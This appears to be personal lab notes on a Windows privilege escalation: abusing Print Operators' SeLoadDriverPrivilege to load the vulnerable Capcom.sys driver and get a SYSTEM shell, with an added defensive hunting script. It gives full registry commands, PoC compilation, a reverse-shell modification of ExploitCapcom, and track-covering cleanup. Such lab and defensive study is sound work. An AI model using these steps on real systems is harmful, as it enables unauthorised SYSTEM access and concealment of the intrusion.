# Intro
- [Print Operators](https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#print-operators) is another highly privileged group, which grants its members the `SeLoadDriverPrivilege`, rights to manage, create, share, and delete printers connected to a DC, as well as the ability to log on locally to a DC and shut it down
- NOTE: Since Windows 10 Version 1803, the `SeLoadDriverPrivilege` is not exploitable this way, because driver references placed under `HKEY_CURRENT_USER` are no longer honoured when a driver is loaded
# Confirm Membership and Privilege
```powershell
whoami /groups #shows memberships for current user
whoami /priv #shows privs for current user
```
- If we see group membership from `whoami /groups` but don't see the `SeLoadDriverPrivilege` from `whoami /priv`, we will need to bypass UAC
- The [UACMe](https://github.com/hfiref0x/UACME) repo features a comprehensive list of UAC bypasses, which can be used from the command line
- Alternatively, from a GUI, we can open an administrative command shell and input the credentials of the account that is a member of the Print Operators group
- If we examine the privileges again, `SeLoadDriverPrivilege` is visible but disabled
# `capcom.sys` driver
- It's well known that the `Capcom.sys` driver contains functionality that allows any user to execute shellcode with SYSTEM privs
- We can use the `SeLoadDriverPrivilege` to load this vulnerable driver and privesc
## Loading the driver
- First, download the `Capcom.sys` driver from [here](https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys), and save it to `C:\Tools` (the path referenced by the registry commands below).
- We can use [this](https://raw.githubusercontent.com/3gstudent/Homework-of-C-Language/master/EnableSeLoadDriverPrivilege.cpp) tool to load the driver
- NOTE: The PoC enables the privilege as well as loads the driver for us
- Download it locally and edit it, replacing its includes with the ones below
```cpp
#include <windows.h>
#include <assert.h>
#include <winternl.h>
#include <sddl.h>
#include <stdio.h>
#include "tchar.h"
```
- Next, from a Visual Studio 2019 Developer Command Prompt, compile the PoC using `cl.exe`
```cmd
cl.exe /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp
```
- Then, issue the commands below to add a reference to the `Capcom.sys` driver under our `HKEY_CURRENT_USER` tree
- Note: The `\??\` prefix in the ImagePath below makes it an [NT Object Path](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/c1550f98-a1ce-426a-9991-7509e7c3787c), which Windows resolves to the driver's real on-disk location when the driver is loaded
```cmd
reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"
reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1
```
- Next, with Nirsoft's [DriverView.exe](http://www.nirsoft.net/utils/driverview.html), we can verify that the Capcom.sys driver is not yet loaded
```powershell
.\DriverView.exe /stext drivers.txt
cat drivers.txt | Select-String -pattern Capcom
```
- Then, run the `EnableSeLoadDriverPrivilege.exe` binary that we compiled above
```cmd
EnableSeLoadDriverPrivilege.exe
```
- Now, verify that the `capcom.sys` driver is listed with `DriverView.exe`
```powershell
.\DriverView.exe /stext drivers.txt
cat drivers.txt | Select-String -pattern Capcom
```
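The loading steps above leave two artefacts a defender can hunt for: a `System\CurrentControlSet` subtree inside a per-user hive, and a kernel driver whose path points outside `System32\drivers`. The PowerShell below is an added hunting script (not from the original notes or from HTB) that walks every loaded user hive for such driver references; it assumes it is run from an elevated PowerShell on the host being audited, and the build-number threshold 17134 (Windows 10 version 1803) is my assumption matching the note at the top of the page.

```powershell
# Added hunting script (not from the original notes). Run elevated so every
# loaded user hive under HKEY_USERS is readable. A clean user hive never
# contains System\CurrentControlSet, so any hit deserves a closer look.

# Assumption: build 17134 is Windows 10 version 1803, after which per-user
# driver references are no longer honoured by the loader.
$build = [int](Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').CurrentBuildNumber
if ($build -ge 17134) {
    Write-Host "Build $build: HKCU driver references should no longer load, but leftover keys still indicate tampering."
}

if (-not (Get-PSDrive -Name HKU -ErrorAction SilentlyContinue)) {
    New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
}

# Snapshot of currently loaded kernel drivers, to tell a planted key from a loaded driver.
$loaded = Get-CimInstance Win32_SystemDriver | Select-Object -ExpandProperty PathName

$findings = foreach ($hive in Get-ChildItem 'HKU:\' | Where-Object { $_.PSChildName -notlike '*_Classes' }) {
    $base = "HKU:\$($hive.PSChildName)\System\CurrentControlSet"
    if (-not (Test-Path $base)) { continue }
    foreach ($key in Get-ChildItem $base -Recurse -ErrorAction SilentlyContinue) {
        $props = Get-ItemProperty $key.PSPath -ErrorAction SilentlyContinue
        if (-not $props.ImagePath) { continue }
        # Strip the \??\ NT object path prefix so the file can be inspected on disk.
        $file = $props.ImagePath -replace '^\\\?\?\\', ''
        $leaf = Split-Path $file -Leaf
        $sig  = if (Test-Path $file) { (Get-AuthenticodeSignature $file).Status } else { 'FileMissing' }
        [pscustomobject]@{
            UserSid   = $hive.PSChildName
            Key       = $key.Name
            ImagePath = $props.ImagePath
            Type      = $props.Type          # 1 = kernel driver, as set by the reg add above
            Signature = $sig
            Loaded    = [bool]($loaded -like "*$leaf")
        }
    }
}

if ($findings) { $findings | Format-Table -AutoSize } else { Write-Host 'No per-user CurrentControlSet driver references found.' }
```

A valid Authenticode signature is not a clean bill of health here: the driver on this page is signed, which is exactly why it loads, so the location of the key is the stronger signal.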
## Exploiting the loaded driver
- To exploit the `capcom.sys` driver, we can use the [ExploitCapcom](https://github.com/tandasat/ExploitCapcom) tool after compiling it with Visual Studio
```powershell
.\ExploitCapcom.exe
```
- This will launch a shell with SYSTEM privs
## Alternative exploitation w/o GUI
- If we do not have GUI access to the target, we will have to modify the `ExploitCapcom.cpp` code before compiling
- Here we can edit line 292 and replace `"C:\\Windows\\system32\\cmd.exe"` with, say, a reverse shell binary created with `msfvenom`, for example: `c:\ProgramData\revshell.exe`
```cpp
// Default code that launches a command shell process
static bool LaunchShell()
{
    TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");
    PROCESS_INFORMATION ProcessInfo;
    STARTUPINFO StartupInfo = { sizeof(StartupInfo) };
    if (!CreateProcess(CommandLine, CommandLine, nullptr, nullptr, FALSE,
                       CREATE_NEW_CONSOLE, nullptr, nullptr, &StartupInfo,
                       &ProcessInfo))
    {
        return false;
    }
    CloseHandle(ProcessInfo.hThread);
    CloseHandle(ProcessInfo.hProcess);
    return true;
}
```
```cpp
// Replacement line
TCHAR CommandLine[] = TEXT("C:\\ProgramData\\revshell.exe");
```
- We would set up a listener based on the `msfvenom` payload we generated and hopefully receive a reverse shell connection back when executing `ExploitCapcom.exe`
- If a revshell connection is blocked for some reason, we can try a bind shell or exec/add user payload
## Automating the above steps
- Use [EoPLoadDriver](https://github.com/TarlogicSecurity/EoPLoadDriver/) to automate the process of enabling the privilege, creating the registry key, and executing `NTLoadDriver` to load the driver
```cmd
EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\Tools\Capcom.sys
```
- Then, run `ExploitCapcom.exe` to pop a SYSTEM shell or run our custom binary
## Cleanup
- Cover our tracks by deleting the registry key we added
```cmd
reg delete HKCU\System\CurrentControlSet\Capcom
```
---
# Exercise
## Initial Enum
- `ping` test ![[images/Pasted image 20260220192618.png]]
- `nmap` scan ![[images/Pasted image 20260220192658.png]]
- `rdp` into target with given creds
- light internal enum ![[images/Pasted image 20260220193300.png]] ![[images/Pasted image 20260220192857.png]]
- We are in the `print operators` group but we do not see the `SeLoadDriver` priv
- open an elevated shell ![[images/Pasted image 20260220193005.png]]
- Now we see that the `SeLoadDriver` priv is disabled
- see what tools we have access to ![[images/Pasted image 20260220193113.png]]
## Example using `EnableSeLoadDriverPrivilege.exe`
- First, add registry key references to `\tools\capcom.sys` under our HKEY_CURRENT_USER tree ![[images/Pasted image 20260220193509.png]]
- Now, verify driver is not loaded with `DriverView.exe`
- No results from the `Select-String` powershell cmdlet ![[images/Pasted image 20260220193625.png]]
- Run `EnableSeLoadDriverPrivilege.exe`
- The `SeLoadDriver` priv is now enabled ![[images/Pasted image 20260220193709.png]]
- Now, verify driver is indeed loaded with `DriverView.exe` ![[images/Pasted image 20260220193756.png]]
- Run `ExploitCapcom.exe` ![[images/Pasted image 20260220193922.png]]
## Example using `EoPLoadDriver`
- Driver loaded and `SeLoadDriver` priv enabled ![[images/Pasted image 20260220194352.png]]
- Now we would just need to run `ExploitCapcom.exe`